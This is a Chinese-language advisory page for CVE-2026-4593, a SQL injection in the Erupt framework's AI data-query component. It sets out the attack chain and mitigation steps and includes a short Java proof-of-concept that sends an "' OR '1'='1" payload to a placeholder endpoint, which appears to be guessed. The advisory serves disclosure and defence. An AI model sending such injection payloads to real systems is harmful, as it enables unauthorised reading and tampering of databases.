CVE-2026-4593 CVSS 6.3 中危

CVE-2026-4593: Erupt框架Hibernate SQL注入漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4593

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Erupt

漏洞概述

Erupt erupt bis 1.13.3版本中存在SQL注入漏洞。该漏洞源于组件MCP Tool Interface的`EruptDataQuery.java`文件中的`EruptDataQuery`函数未能有效净化用户输入，导致Hibernate SQL注入。攻击者可利用低权限账户远程发起攻击，无需用户交互，成功利用可能导致数据库信息泄露、数据篡改及系统可用性受损。目前厂商尚未对此漏洞做出响应。

技术细节

该漏洞位于Erupt框架的AI组件中，具体路径为`erupt-ai/src/main/java/xyz/erupt/ai/call/impl/EruptDataQuery.java`。在`EruptDataQuery`函数处理数据查询请求时，由于未对传入的参数进行严格的类型检查或安全过滤，直接将其拼接到Hibernate查询语句中，导致了SQL注入漏洞。Hibernate虽然提供ORM机制，但如果直接使用原生SQL或拼接HQL/JPQL时仍存在注入风险。攻击者可以通过构造恶意的SQL payload，绕过Hibernate的部分防御机制，执行任意SQL命令。根据CVSS向量，攻击复杂度低，且需要低权限，这表明利用门槛较低。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统使用了存在漏洞的Erupt框架版本（<=1.13.3）。

STEP 2

获取访问

攻击者使用低权限账户登录系统（PR:L）。

STEP 3

发送恶意请求

攻击者向`EruptDataQuery`接口发送特制的HTTP请求，在参数中注入SQL语句。

STEP 4

执行注入

由于后端未过滤输入，Hibernate将恶意数据拼接为SQL命令并执行。

STEP 5

达成目标

攻击者成功读取、修改或删除数据库中的数据，影响系统机密性、完整性和可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC Concept for CVE-2026-4593
// Targeting the EruptDataQuery endpoint

import java.io.*;
import java.net.*;

public class Exploit {
    public static void main(String[] args) {
        try {
            String target = "http://target.com/erupt-api/data/query";
            // Payload attempting to bypass simple Hibernate checks
            String maliciousPayload = "test' OR '1'='1";
            
            URL url = new URL(target);
            HttpURLConnection conn = (HttpURLConnection) url.openConnection();
            conn.setRequestMethod("POST");
            conn.setDoOutput(true);
            
            String params = "data=" + URLEncoder.encode(maliciousPayload, "UTF-8");
            
            OutputStream os = conn.getOutputStream();
            os.write(params.getBytes());
            os.flush();
            
            BufferedReader br = new BufferedReader(new InputStreamReader(conn.getInputStream()));
            String line;
            while ((line = br.readLine()) != null) {
                System.out.println(line);
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

影响范围

Erupt <= 1.13.3

防御指南

临时缓解措施

建议立即限制对MCP Tool Interface的访问权限，并在应用防火墙（WAF）中部署针对SQL注入特征的规则。同时，应检查`EruptDataQuery.java`中的代码逻辑，确保所有用户输入经过严格过滤后再进行数据库查询操作，直至官方发布补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4593
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4593
3 Details https://www.cvedetails.com/cve/CVE-2026-4593/
4 VulDB https://vuldb.com/cve/CVE-2026-4593
5 Link https://fx4tqqfvdw4.feishu.cn/docx/EunDdwORZoG3uzxpLykcj24mncJ?from=from_copylink
6 Link https://vuldb.com/?ctiid.352430
7 Link https://vuldb.com/?id.352430
8 Link https://vuldb.com/?submit.775593

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表